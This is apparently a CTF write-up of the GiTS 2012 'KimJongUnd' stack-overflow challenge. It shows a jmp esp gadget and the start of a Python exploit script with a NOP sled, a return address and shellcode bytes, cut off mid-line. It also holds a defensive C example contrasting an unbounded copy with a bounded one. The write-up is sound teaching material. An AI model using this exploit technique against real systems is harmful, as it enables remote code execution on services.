codezen.fr

29 Jan 2012

GiTS 2012 KimJongUnd Write-Up

Stage 13

Question: KimJongUnd

We lost a lot of time on this exploitation challenge, for several reasons.

The vulnerability is in the command line read after the password: the input overflows a stack buffer, which gives control of EIP.
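
As an added illustration (not the challenge binary's code, which is not shown in this write-up), the C below reconstructs the bug class just described in its simplest form, an unbounded copy of the command line into a fixed-size stack buffer, next to the bounded form a defender would ship. The buffer size `CMD_MAX`, the function names and the helper `probe_command_length` are all assumptions made for this example; the point is the check that the hardened version performs before the copy.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define CMD_MAX 32   /* hypothetical size of the fixed stack buffer */

/* Hypothetical reconstruction of the bug class: the command line is
 * copied into a fixed-size stack buffer with no length check, so an
 * over-long command overwrites the saved frame pointer and return
 * address that sit above the buffer. Shown for contrast only; never
 * pass untrusted input to this function. */
void handle_command_unsafe(const char *line)
{
    char cmd[CMD_MAX];
    strcpy(cmd, line);          /* unbounded: overflows when strlen(line) >= CMD_MAX */
    printf("cmd: %s\n", cmd);
}

/* Hardened form: the copy is bounded by the destination size and the
 * result is always NUL-terminated. Returns 0 on success, -1 if the
 * input does not fit. Rejecting is preferred over silent truncation
 * because a truncated command may change meaning. */
int copy_command_bounded(const char *line, char *dst, size_t dstsz)
{
    /* Look for the terminator only within the space we actually have. */
    const char *nul = memchr(line, '\0', dstsz);
    if (nul == NULL)
        return -1;              /* no NUL within dstsz bytes: too long */
    memcpy(dst, line, (size_t)(nul - line) + 1);
    return 0;
}

int handle_command_safe(const char *line)
{
    char cmd[CMD_MAX];
    if (copy_command_bounded(line, cmd, sizeof cmd) != 0)
        return -1;              /* caller should report and drop the request */
    printf("cmd: %s\n", cmd);
    return 0;
}

/* Self-check helper (assumed, not part of any real daemon): builds a
 * command of `len` 'A' characters and returns what the safe handler
 * decides about it. */
int probe_command_length(size_t len)
{
    char buf[1024];
    if (len >= sizeof buf)
        return -1;
    memset(buf, 'A', len);
    buf[len] = '\0';
    return handle_command_safe(buf);
}

int main(void)
{
    /* Constructed inputs: one that fits, one that is exactly one byte too long. */
    printf("31 bytes -> %d\n", probe_command_length(31));   /* 0 */
    printf("32 bytes -> %d\n", probe_command_length(32));   /* -1 */
    return 0;
}
```

The boundary to watch is the terminator: a `CMD_MAX`-byte buffer holds at most `CMD_MAX - 1` characters plus the NUL, so a 32-character command must already be rejected.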

Our buffer is on the stack, so we spent some time finding a suitable gadget such as this one:

.text:08048850 55 push ebp
.text:08048851 89 E5 mov ebp, esp
.text:08048853 FF E4 jmp esp

We have around 50 bytes available. Since the target is a forking daemon that talks over a socket, we first go for a shellcode that reads the command from the socket and writes the output back to it.

#!/usr/bin/env python

import socket
import sys
import time

if len(sys.argv) != 3:
  print '\nUsage:\t./kim.py [host] [port]'
  sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)                         # Creating Socket
s.connect((host, port))                                                       # Connecting to socket
crash  = '\x90' * 524
crash += '\x50\x88\x04\x08'

crash += '\x31\xc9\x31\xdb\xb3\x04\x